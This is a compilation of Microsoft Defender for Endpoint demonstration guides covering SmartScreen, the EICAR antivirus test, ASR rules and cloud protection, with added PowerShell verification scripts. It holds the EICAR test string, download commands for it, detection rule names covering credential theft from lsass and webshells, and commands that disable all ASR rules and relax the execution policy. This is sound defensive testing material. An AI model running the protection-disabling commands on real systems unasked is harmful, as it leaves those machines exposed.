We encourage you to read the Microsoft Defender Antivirus documentation, and to
download the Evaluation guide.

Demonstrations
The following table lists the available demonstrations alphabetically, with their
associated protection area.

#  | Demonstration name                                                | Protection area | Description
1  | Endpoint Detection and Response (EDR) detections                  | EDR | Confirm that EDR is detecting cyber threats such as malware.
2  | Validate antimalware                                              | NGP | Confirm that antivirus/antimalware is detecting and blocking malware.
3  | Potentially unwanted applications (PUA) demonstration             | NGP | Confirm that potentially unwanted applications (PUAs) are being blocked on your network by downloading a fake (safe) PUA file.
4  | Cloud-delivered protection demonstration                          | NGP | Confirm that cloud-delivered protection is working properly on your computer.
5  | App reputation demonstration                                      | NGP | Navigate to the app reputation page to see the demonstration scenario using Microsoft Edge.
6  | URL reputation demonstrations                                     | NGP | Navigate to the URL Reputation page to see the demonstration scenarios using Microsoft Edge.
7  | Network protection demonstrations                                 | ASR | Navigate to a suspicious URL to trigger network protection.
8  | Attack surface reduction rules (ASR rules) demonstrations         | ASR | Download sample files to trigger each ASR rule.
9  | Exploit protection (EP) demonstrations                            | ASR | Apply custom exploit protection settings.
10 | Controlled folder access (CFA) demonstration (block script)       | ASR | Download the CFA test tool.
11 | Controlled folder access (CFA) demonstrations (block ransomware)  | ASR | Download and execute a sample file to trigger CFA ransomware protection.

See also

Attack surface reduction (ASR) overview
Test attack surface reduction rules
Next Generation Protection (NGP) overview
Endpoint detection and response (EDR) overview
Microsoft Defender for Endpoint security blog


SmartScreen app reputation
demonstration
Article • 01/17/2024

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business
Microsoft Defender for Endpoint Plan 1

Test how Microsoft Defender SmartScreen helps you identify potentially malicious
downloaded programs based on app reputation.

Scenario requirements and setup

Windows 11 or Windows 10
Windows Server 2022, Windows Server 2019, Windows Server 2016,
Windows Server 2012 R2, or Windows Server 2008 R2
Microsoft Edge or Internet Explorer browser required
To turn the check on or off, go to Settings > Update & Security > Windows Security > Open
Windows Security > App & browser control > Check apps and files

Scenario Demos

Known good program

This program has a good reputation; the download should run uninterrupted:

Known good program download

Launching this link should let the download run without a SmartScreen prompt
(screenshot not reproduced here).

Unknown program

Because the program download doesn't have sufficient reputation to ensure that it's
trustworthy, SmartScreen will show a warning before running the program download.

Unknown program

Launching this link should show the SmartScreen warning (screenshot not reproduced
here).

Known malware

This download is known malware; SmartScreen should block this program from running.

Known malware

Launching this link should show the SmartScreen block message (screenshot not
reproduced here).
Learn more

Microsoft Defender SmartScreen Documentation

See also

Microsoft Defender for Endpoint - demonstration scenarios


AV detection test for verifying device's
onboarding and reporting services
Article • 01/31/2024

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business
Microsoft Defender for Endpoint Plan 1
Microsoft Defender Antivirus
Microsoft Defender for Individuals

Scenario requirements and setup

Windows 11, Windows 10, Windows 8.1, Windows 7 SP1
Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows
Server 2012, and Windows Server 2008 R2
Linux
macOS
Microsoft Defender real-time protection is enabled
EICAR test file to simulate malware

After you enable Microsoft Defender for Endpoint, Microsoft Defender for Business, or
Microsoft Defender Antivirus, you can test the service and run a proof of concept to
familiarize yourself with its features and validate that the advanced security capabilities
effectively protect your device by generating real security alerts.

Run an AV detection test to verify that the device is properly onboarded and reporting
to the service. Perform the following steps on the newly onboarded device:

Windows

1. Use an EICAR test file instead of real malware to avoid causing damage.
Microsoft Defender Antivirus treats EICAR test files as malware.

2. Create the EICAR test file: copy the following string, paste it into a new .txt
file, and save it as EICAR.txt:

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

3. Real-time protection should detect and quarantine the file as soon as it is
saved. If the device is onboarded, a detection alert for the device should then
appear in the Microsoft Defender portal, confirming that the device is reporting.
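Added example (not part of the Microsoft article): a PowerShell script that performs the Windows test end to end and reads each signal a practitioner would check. It assembles the EICAR string from two halves so the script file itself is not the detection target, waits for real-time protection to act, confirms the quarantine through Get-MpThreat, and then reads the sensor service state and the OnboardingState value the Defender for Endpoint sensor records. The 30-second wait and the use of the TEMP folder are assumptions for this example.

```powershell
# Added example (not from the Microsoft article): run the EICAR detection test on
# Windows and verify that the device is onboarded to Defender for Endpoint.
# Run in an elevated PowerShell session on the device under test.

$waitSeconds = 30   # assumption: time allowed for real-time protection to act

# Assemble the EICAR string from two halves so that this script, saved to disk,
# does not itself carry the complete test signature.
$eicarHead = 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR'
$eicarTail = '-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'
$eicar     = $eicarHead + $eicarTail
$testFile  = Join-Path $env:TEMP 'EICAR.txt'

# 1. Real-time protection must be on, or nothing will be detected.
$status = Get-MpComputerStatus
if (-not $status.RealTimeProtectionEnabled) {
    throw 'Real-time protection is disabled; enable it before running the test.'
}

# 2. Write the file as ASCII with no trailing newline: EICAR is recognised only
#    when the 68-character string is at the very start of the file.
$writeBlocked = $false
try {
    Set-Content -Path $testFile -Value $eicar -Encoding Ascii -NoNewline -ErrorAction Stop
} catch {
    # Real-time protection may reject the write itself; that also counts as a detection.
    $writeBlocked = $true
    Write-Host "Write blocked by antivirus: $($_.Exception.Message)"
}

# 3. Give real-time protection time to quarantine the file.
$deadline = (Get-Date).AddSeconds($waitSeconds)
while ((Test-Path $testFile) -and ((Get-Date) -lt $deadline)) {
    Start-Sleep -Seconds 2
}
$quarantined = -not (Test-Path $testFile)

# 4. Confirm the detection in the local Defender Antivirus threat history.
$detection  = Get-MpThreat | Where-Object { $_.ThreatName -like '*EICAR*' } | Select-Object -First 1
$threatName = if ($detection) { $detection.ThreatName } else { 'not found' }

# 5. Sensor checks: the 'Sense' service should be running, and OnboardingState
#    under the sensor's Status key is 1 once onboarding has completed. A local
#    detection without these will not show up in the Defender portal.
$sense      = Get-Service -Name Sense -ErrorAction SilentlyContinue
$senseState = if ($sense) { [string]$sense.Status } else { 'not installed' }
$statusKey  = 'HKLM:\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status'
$onboarding = (Get-ItemProperty -Path $statusKey -Name OnboardingState -ErrorAction SilentlyContinue).OnboardingState

[pscustomobject]@{
    TestFile        = $testFile
    WriteBlocked    = $writeBlocked
    FileQuarantined = $quarantined
    ThreatName      = $threatName
    SenseService    = $senseState
    OnboardingState = $onboarding
    Onboarded       = ($onboarding -eq 1 -and $senseState -eq 'Running')
} | Format-List

if (-not ($writeBlocked -or $quarantined)) {
    Write-Warning "EICAR file still present after $waitSeconds seconds; check exclusions and real-time protection."
}
```

If the file survives, the usual causes are an antivirus exclusion covering the TEMP folder or real-time protection being off; if it is quarantined but Onboarded is false, the antivirus works locally but the device is not yet reporting to the service.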

Linux/macOS

1. Ensure that real-time protection is enabled (the following command prints true):

Bash

mdatp health --field real_time_protection_enabled

2. Open a Terminal window. Copy and execute the following command:

Linux

Bash

curl -o /tmp/eicar.com.txt https://secure.eicar.org/eicar.com.txt

macOS

Bash

curl -o ~/Downloads/eicar.com.txt https://secure.eicar.org/eicar.com.txt

3. The file is quarantined by Defender for Endpoint on Linux or macOS. Use the
following command to list all the detected threats:

Bash

mdatp threat list


Attack surface reduction rules
demonstrations
Article • 02/16/2024

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business
Microsoft Defender for Endpoint Plan 1
Microsoft Defender Antivirus

Attack surface reduction rules target specific behaviors that are typically used by
malware and malicious apps to infect machines, such as:

Executable files and scripts used in Office apps or web mail that attempt to
download or run files
Scripts that are obfuscated or otherwise suspicious
Behaviors that apps undertake that aren't initiated during normal day-to-day work

Scenario requirements and setup

Windows 11, Windows 10 1709 build 16273 or later
Windows Server 2022, Windows Server 2019, Windows Server 2016, or Windows
Server 2012 R2 with the unified MDE client
Microsoft Defender Antivirus
Microsoft 365 Apps (Office; required for Office rules and sample)
Download attack surface reduction PowerShell scripts

PowerShell commands

PowerShell

Add-MpPreference -AttackSurfaceReductionRules_Ids BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EfC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 3B576869-A4EC-4529-8536-B80A7769E899 -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids D3E037E1-3EB8-44C8-A917-57927947596D -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids D1E49AAC-8F56-4280-B9BA-993A6D77406C -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids B2B3F03D-6A65-4F7B-A9C7-1C7EF74A9BA4 -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids C1DB55AB-C21A-4637-BB3F-A12568109D35 -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 01443614-CD74-433A-B99E-2ECDC07BFC25 -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 56a863a9-875e-4185-98a7-b882c64b5ce5 -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids e6db77e5-3df2-4cf1-b95a-636979351e5b -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids a8f5898e-1dc8-49a9-9878-85004b8a61e6 -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 26190899-1602-49E8-8B27-EB1D0A1CE869 -AttackSurfaceReductionRules_Actions AuditMode
Add-MpPreference -AttackSurfaceReductionRules_Ids 7674BA52-37EB-4A4F-A9A1-F0F9A1619A2C -AttackSurfaceReductionRules_Actions AuditMode

Rule states

State    | Mode       | Numeric value
Disabled | Off        | 0
Enabled  | Block mode | 1
Audit    | Audit mode | 2

Verify configuration

The rule IDs and their actions are returned as two parallel arrays: element i of
AttackSurfaceReductionRules_Actions is the state of element i of
AttackSurfaceReductionRules_Ids.

PowerShell

Get-MpPreference | Select-Object AttackSurfaceReductionRules_Ids, AttackSurfaceReductionRules_Actions
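Added example, not from the Microsoft article: Add-MpPreference accepts arrays for -AttackSurfaceReductionRules_Ids and -AttackSurfaceReductionRules_Actions, so the whole rule set can be applied in one call and read back in one pass. The script below applies the same rules as the commands above, decodes the numeric state of each configured rule (the GUID-to-name map is taken from the rule table in this article), and then pulls the ASR block and audit events (event IDs 1121 and 1122 in the Microsoft-Windows-Windows Defender/Operational log) so you can confirm that a test file hit the rule you expected. The 24-hour lookback is an assumption; the Warn state value 6 is not in the table above but is a real rule state.

```powershell
# Added example (not from the Microsoft article): apply the ASR rules in one call,
# read the effective state back, and list the events the rules generate.
# Run in an elevated PowerShell session.

# GUID -> rule name, taken from the rule table in this article.
$asrRules = @{
    'BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550' = 'Block executable content from email client and webmail'
    'D4F940AB-401B-4EFC-AADC-AD5F3C50688A' = 'Block Office applications from creating child processes'
    '3B576869-A4EC-4529-8536-B80A7769E899' = 'Block Office applications from creating executable content'
    '75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84' = 'Block Office applications from injecting into other processes'
    'D3E037E1-3EB8-44C8-A917-57927947596D' = 'Impede JavaScript and VBScript to launch executables'
    '5BEB7EFE-FD9A-4556-801D-275E5FFC04CC' = 'Block execution of potentially obfuscated scripts'
    '92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B' = 'Block Win32 imports from macro code in Office'
    'D1E49AAC-8F56-4280-B9BA-993A6D77406C' = 'Block process creations originating from PSExec and WMI commands'
    'B2B3F03D-6A65-4F7B-A9C7-1C7EF74A9BA4' = 'Block untrusted or unsigned executables on removable USB media'
    'C1DB55AB-C21A-4637-BB3F-A12568109D35' = 'Aggressive ransomware prevention'
    '01443614-CD74-433A-B99E-2ECDC07BFC25' = 'Block executables unless they meet prevalence, age, or trusted list criteria'
    '56A863A9-875E-4185-98A7-B882C64B5CE5' = 'Block abuse of exploited vulnerable signed drivers'
    '9E6C4E1F-7D60-472F-BA1A-A39EF669E4B2' = 'Block credential stealing from lsass.exe'
    'E6DB77E5-3DF2-4CF1-B95A-636979351E5B' = 'Block persistence through WMI event subscription'
    'A8F5898E-1DC8-49A9-9878-85004B8A61E6' = 'Block webshell creation for servers'
    '26190899-1602-49E8-8B27-EB1D0A1CE869' = 'Block Office communication application from creating child processes'
    '7674BA52-37EB-4A4F-A9A1-F0F9A1619A2C' = 'Block Adobe Reader from creating child processes'
}

# Numeric states: 0, 1 and 2 are the values in the article's table; 6 (Warn) also exists.
$stateNames = @{ 0 = 'Disabled'; 1 = 'Block'; 2 = 'Audit'; 6 = 'Warn' }

# Keep the two rules the article starts in audit mode as audit, everything else in block.
$auditFirst = @('26190899-1602-49E8-8B27-EB1D0A1CE869', '7674BA52-37EB-4A4F-A9A1-F0F9A1619A2C')
$ids     = @($asrRules.Keys)
$actions = @(foreach ($id in $ids) { if ($auditFirst -contains $id) { 'AuditMode' } else { 'Enabled' } })

# One call: element i of -Actions applies to element i of -Ids.
Add-MpPreference -AttackSurfaceReductionRules_Ids $ids -AttackSurfaceReductionRules_Actions $actions

# Read the effective configuration back and pair each GUID with its state.
function Get-AsrRuleState {
    $pref = Get-MpPreference
    for ($i = 0; $i -lt $pref.AttackSurfaceReductionRules_Ids.Count; $i++) {
        $id    = ([string]$pref.AttackSurfaceReductionRules_Ids[$i]).ToUpperInvariant()
        $code  = [int]$pref.AttackSurfaceReductionRules_Actions[$i]
        $name  = if ($asrRules.ContainsKey($id)) { $asrRules[$id] } else { '(not in the rule table)' }
        $state = if ($stateNames.ContainsKey($code)) { $stateNames[$code] } else { "code $code" }
        [pscustomobject]@{ RuleId = $id; Name = $name; State = $state }
    }
}

# Events written by the rules: 1121 = action blocked, 1122 = would have been blocked (audit).
function Get-AsrEvent([int]$Hours = 24) {
    $guidPattern = '[0-9A-Fa-f]{8}-(?:[0-9A-Fa-f]{4}-){3}[0-9A-Fa-f]{12}'
    $filter = @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 1121, 1122
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $ruleId = ([regex]::Match($_.Message, $guidPattern)).Value.ToUpperInvariant()
        $mode   = if ($_.Id -eq 1121) { 'Block' } else { 'Audit' }
        $name   = if ($asrRules.ContainsKey($ruleId)) { $asrRules[$ruleId] } else { '(unknown rule)' }
        [pscustomobject]@{ Time = $_.TimeCreated; Mode = $mode; RuleId = $ruleId; Name = $name }
    }
}

Get-AsrRuleState | Sort-Object State, Name | Format-Table -AutoSize
Get-AsrEvent -Hours 24 | Format-Table -AutoSize
```

Run the event query again after opening one of the test documents: a 1121 event naming the rule you expected confirms the block, while a 1122 event means the rule is still in audit mode and would not have stopped the action.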

Test files

Note: some test files have multiple exploits embedded and trigger multiple rules.

Rule name | Rule GUID
Block executable content from email client and webmail | BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550
Block Office applications from creating child processes | D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Block Office applications from creating executable content | 3B576869-A4EC-4529-8536-B80A7769E899
Block Office applications from injecting into other processes | 75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84
Impede JavaScript and VBScript to launch executables | D3E037E1-3EB8-44C8-A917-57927947596D
Block execution of potentially obfuscated scripts | 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC
Block Win32 imports from Macro code in Office | 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B
Block Process Creations originating from PSExec & WMI commands | D1E49AAC-8F56-4280-B9BA-993A6D77406C
Block Execution of untrusted or unsigned executables inside removable USB media | B2B3F03D-6A65-4F7B-A9C7-1C7EF74A9BA4
Aggressive Ransomware Prevention | C1DB55AB-C21A-4637-BB3F-A12568109D35
Block executable files from running unless they meet a prevalence, age, or trusted list criteria | 01443614-CD74-433A-B99E-2ECDC07BFC25
Block Adobe Reader from creating child processes | 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c
Block abuse of exploited vulnerable signed drivers | 56a863a9-875e-4185-98a7-b882c64b5ce5
Block credential stealing from the Windows local security authority subsystem (lsass.exe) | 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2
Block persistence through WMI event subscription | e6db77e5-3df2-4cf1-b95a-636979351e5b
Block Webshell creation for Servers | a8f5898e-1dc8-49a9-9878-85004b8a61e6
Block Office communication application from creating child processes (set to audit mode in the commands above) | 26190899-1602-49E8-8B27-EB1D0A1CE869
Scenarios

Setup

Download and run this setup script. Before running the script, set the execution policy
to Unrestricted using this PowerShell command. The -Scope Process switch limits the
change to the current session, so the relaxed policy does not persist after the demo:

PowerShell

Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope Process

You can perform these manual steps instead:

1. Create a folder under c: named demo, "c:\demo"
2. Save this clean file into c:\demo.
3. Enable all rules using the PowerShell commands.

Scenario 1: Attack surface reduction blocks a test file with multiple vulnerabilities

1. Enable all rules in block mode using the PowerShell commands (you can copy
and paste them all).
2. Download and open any of the test files/documents, and enable editing and
content, if prompted.

Scenario 1 expected results

You should immediately see an "Action blocked" notification.

Scenario 2: ASR rule blocks the test file with the corresponding vulnerability

1. Configure the rule you want to test using the PowerShell command from the
previous step.

Example: Add-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EfC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled

2. Download and open the test file/document for the rule you want to test, and
enable editing and content, if prompted.
Example: Block Office applications from creating child processes D4F940AB-401B-4EFC-AADC-AD5F3C50688A

Scenario 2 expected results

You should immediately see an "Action blocked" notification.

Scenario 3 (Windows 10 or later): ASR rule blocks unsigned USB content from executing

1. Configure the rule for USB protection (B2B3F03D-6A65-4F7B-A9C7-1C7EF74A9BA4).

PowerShell

Add-MpPreference -AttackSurfaceReductionRules_Ids B2B3F03D-6A65-4F7B-A9C7-1C7EF74A9BA4 -AttackSurfaceReductionRules_Actions Enabled

2. Download the test file for Block Execution of untrusted or unsigned executables
inside removable USB media, copy it to a USB stick, and execute it from there.

Scenario 3 expected results

You should immediately see an "Action blocked" notification.

Scenario 4: What would happen without attack surface reduction

1. Turn off all attack surface reduction rules using the PowerShell commands in the
clean-up section.

2. Download any test file/document, and enable editing and content, if prompted.

Scenario 4 expected results

The files in c:\demo are encrypted and you should get a warning message.
Execute the test file again to decrypt the files.

Clean-up
Download and run this clean-up script
Alternately, you can perform these manual steps:

PowerShell

Add-MpPreference -AttackSurfaceReductionRules_Ids BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 -AttackSurfaceReductionRules_Actions Disabled
Add-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EfC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Disabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 3B576869-A4EC-4529-8536-B80A7769E899 -AttackSurfaceReductionRules_Actions Disabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 -AttackSurfaceReductionRules_Actions Disabled
Add-MpPreference -AttackSurfaceReductionRules_Ids D3E037E1-3EB8-44C8-A917-57927947596D -AttackSurfaceReductionRules_Actions Disabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC -AttackSurfaceReductionRules_Actions Disabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B -AttackSurfaceReductionRules_Actions Disabled
Add-MpPreference -AttackSurfaceReductionRules_Ids D1E49AAC-8F56-4280-B9BA-993A6D77406C -AttackSurfaceReductionRules_Actions Disabled
Add-MpPreference -AttackSurfaceReductionRules_Ids B2B3F03D-6A65-4F7B-A9C7-1C7EF74A9BA4 -AttackSurfaceReductionRules_Actions Disabled
Add-MpPreference -AttackSurfaceReductionRules_Ids C1DB55AB-C21A-4637-BB3F-A12568109D35 -AttackSurfaceReductionRules_Actions Disabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 01443614-CD74-433A-B99E-2ECDC07BFC25 -AttackSurfaceReductionRules_Actions Disabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 56a863a9-875e-4185-98a7-b882c64b5ce5 -AttackSurfaceReductionRules_Actions Disabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 -AttackSurfaceReductionRules_Actions Disabled
Add-MpPreference -AttackSurfaceReductionRules_Ids e6db77e5-3df2-4cf1-b95a-636979351e5b -AttackSurfaceReductionRules_Actions Disabled
Add-MpPreference -AttackSurfaceReductionRules_Ids a8f5898e-1dc8-49a9-9878-85004b8a61e6 -AttackSurfaceReductionRules_Actions Disabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 26190899-1602-49E8-8B27-EB1D0A1CE869 -AttackSurfaceReductionRules_Actions Disabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 7674BA52-37EB-4A4F-A9A1-F0F9A1619A2C -AttackSurfaceReductionRules_Actions Disabled

Clean up c:\demo encryption by running the encrypt/decrypt file
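To confirm which rules are actually active after a scenario or after the clean-up above, and to see the events behind the "Action blocked" notification, the following PowerShell is an added example and not part of the Microsoft article. It reads the rule configuration with Get-MpPreference and the ASR block (1121) and audit (1122) events from the Defender operational log; the GUID-to-name table is supplied here for readability and covers the rules listed in the clean-up section.

```powershell
# Added example, not from the Microsoft article. Run in an elevated PowerShell
# on a Windows 10/11 device with Microsoft Defender Antivirus active.

# Friendly names for the rule GUIDs used in the demonstration and clean-up sections above.
$AsrRuleNames = @{
    '56A863A9-875E-4185-98A7-B882C64B5CE5' = 'Block abuse of exploited vulnerable signed drivers'
    '7674BA52-37EB-4A4F-A9A1-F0F9A1619A2C' = 'Block Adobe Reader from creating child processes'
    'D4F940AB-401B-4EFC-AADC-AD5F3C50688A' = 'Block all Office applications from creating child processes'
    '9E6C4E1F-7D60-472F-BA1A-A39EF669E4B2' = 'Block credential stealing from LSASS'
    'BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550' = 'Block executable content from email client and webmail'
    '01443614-CD74-433A-B99E-2ECDC07BFC25' = 'Block executables unless they meet prevalence, age, or trusted list criteria'
    '5BEB7EFE-FD9A-4556-801D-275E5FFC04CC' = 'Block execution of potentially obfuscated scripts'
    'D3E037E1-3EB8-44C8-A917-57927947596D' = 'Block JavaScript or VBScript from launching downloaded executable content'
    '3B576869-A4EC-4529-8536-B80A7769E899' = 'Block Office applications from creating executable content'
    '75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84' = 'Block Office applications from injecting code into other processes'
    '26190899-1602-49E8-8B27-EB1D0A1CE869' = 'Block Office communication application from creating child processes'
    'E6DB77E5-3DF2-4CF1-B95A-636979351E5B' = 'Block persistence through WMI event subscription'
    'D1E49AAC-8F56-4280-B9BA-993A6D77406C' = 'Block process creations originating from PSExec and WMI commands'
    'B2B3F03D-6A65-4F7B-A9C7-1C7EF74A9BA4' = 'Block untrusted and unsigned processes that run from USB'
    'A8F5898E-1DC8-49A9-9878-85004B8A61E6' = 'Block Webshell creation for Servers'
    '92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B' = 'Block Win32 API calls from Office macros'
    'C1DB55AB-C21A-4637-BB3F-A12568109D35' = 'Use advanced protection against ransomware'
}

function Get-AsrRuleState {
    # One object per configured rule: GUID, friendly name and the mode its numeric action maps to.
    $pref    = Get-MpPreference
    $ids     = @($pref.AttackSurfaceReductionRules_Ids | Where-Object { $_ })
    $actions = @($pref.AttackSurfaceReductionRules_Actions)
    for ($i = 0; $i -lt $ids.Count; $i++) {
        $id   = $ids[$i].ToUpper()
        # Action values: 0 = Disabled, 1 = Block, 2 = Audit, 6 = Warn.
        $mode = switch ([int]$actions[$i]) {
            0 { 'Disabled' } 1 { 'Block' } 2 { 'Audit' } 6 { 'Warn' } default { "Unknown($_)" }
        }
        [pscustomobject]@{ RuleId = $id; Name = $AsrRuleNames[$id]; Action = $actions[$i]; Mode = $mode }
    }
}

function Get-AsrEvent {
    param([int]$Hours = 1)
    # 1121 = a rule blocked an action; 1122 = a rule in audit mode recorded what it would have blocked.
    $filter = @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 1121, 1122
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # Pull the named EventData fields (ID, Process Name, Path) out of the event XML.
        $data = @{}
        foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        $ruleId  = "$($data['ID'])".ToUpper()
        $outcome = if ($_.Id -eq 1121) { 'Blocked' } else { 'Audited' }
        [pscustomobject]@{
            Time    = $_.TimeCreated
            Outcome = $outcome
            Rule    = $AsrRuleNames[$ruleId]
            Process = $data['Process Name']
            Target  = $data['Path']
        }
    }
}

Get-AsrRuleState | Sort-Object Mode, Name | Format-Table -AutoSize
Get-AsrEvent -Hours 24 | Format-Table -AutoSize
```

Run Get-AsrRuleState once before Scenario 4 and once after the clean-up: every rule listed above should read Disabled, and Get-AsrEvent should show the 1121 events produced by Scenarios 2 and 3.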

See also
Attack surface reduction rules deployment guide

Attack surface reduction rules reference

Microsoft Defender for Endpoint - demonstration scenarios

Tip
Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .


Cloud-delivered protection demonstration

Article • 01/16/2024

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business
Microsoft Defender for Endpoint Plan 1
Microsoft Defender Antivirus
Microsoft Defender for Individuals

Cloud-delivered protection for Microsoft Defender Antivirus, also referred to as
Microsoft Advanced Protection Service (MAPS), provides you with strong, fast protection
in addition to our standard real-time protection.

Scenario requirements and setup

Windows 11, Windows 10, Windows 8.1, and Windows 7 SP1
Microsoft Defender Real-time protection is enabled
Cloud-delivered protection is enabled by default; however, you may need to re-enable it
if it has been disabled as part of previous organizational policies. For more information,
see Enable cloud-delivered protection in Microsoft Defender Antivirus.
You can also download and use the PowerShell script to enable this setting and
others on Windows 10 and Windows 11.

Scenario

1. Download the test file. Important: The test file isn't malicious; it's just a harmless
file simulating a virus.

2. If you see the file blocked by Microsoft Defender SmartScreen, select the View
downloads button.

3. In the Downloads menu, right-click the blocked file and select Download unsafe file.

4. You should see that Microsoft Defender Antivirus found a virus and deleted it.

Note

In some cases, you might also see a Threat Found notification from Microsoft
Defender Security Center.

5. If the file executes, or if you see that it was blocked by Microsoft Defender
SmartScreen, cloud-delivered protection isn't working. For more information, see
Configure and validate network connections for Microsoft Defender Antivirus.
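Before downloading the test file, the settings that step 5 depends on can be checked from PowerShell. The block below is an added example, not part of the Microsoft article; it assumes an elevated session on Windows 10/11 where Microsoft Defender Antivirus is the active antivirus, and uses MpCmdRun.exe -ValidateMapsConnection for the connectivity test.

```powershell
# Added example, not from the Microsoft article. Run in an elevated PowerShell on
# Windows 10/11 where Microsoft Defender Antivirus is the active antivirus.

function Test-CloudProtectionReadiness {
    # Checks the settings the scenario depends on and the MAPS connection itself.
    $pref   = Get-MpPreference
    $status = Get-MpComputerStatus

    # MAPSReporting: 0 = cloud-delivered protection off, 1 = basic, 2 = advanced membership.
    $cloudOn = $pref.MAPSReporting -ne 0
    # Block at first sight also needs sample submission: 1 = send safe samples, 3 = send all
    # samples (0 = always prompt and 2 = never send leave it unable to submit).
    $samplesOk = $pref.SubmitSamplesConsent -in 1, 3

    # Same connectivity check the Defender troubleshooting guidance uses.
    $mpCmdRun      = Join-Path $env:ProgramFiles 'Windows Defender\MpCmdRun.exe'
    $mapsOutput    = (& $mpCmdRun -ValidateMapsConnection 2>&1 | Out-String)
    $mapsReachable = $mapsOutput -match 'ValidateMapsConnection successfully'

    $ready = $status.RealTimeProtectionEnabled -and $cloudOn -and $samplesOk -and
             (-not $pref.DisableBlockAtFirstSeen) -and $mapsReachable
    [pscustomobject]@{
        RealTimeProtection   = $status.RealTimeProtectionEnabled
        CloudProtectionOn    = $cloudOn
        CloudBlockLevel      = $pref.CloudBlockLevel
        SampleSubmissionOk   = $samplesOk
        BlockAtFirstSightOff = $pref.DisableBlockAtFirstSeen
        MapsReachable        = $mapsReachable
        ReadyForScenario     = $ready
    }
}

function Get-RecentDefenderDetection {
    # After step 4, the deleted test file appears here with its threat ID and the action result.
    Get-MpThreatDetection |
        Sort-Object InitialDetectionTime -Descending |
        Select-Object -First 5 InitialDetectionTime, ThreatID, ActionSuccess, Resources
}

Test-CloudProtectionReadiness | Format-List
Get-RecentDefenderDetection | Format-List
```

If ReadyForScenario is false, fix the reported setting first; a false MapsReachable with everything else true points at the proxy or firewall, which is the case the network connections article covers.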

See also
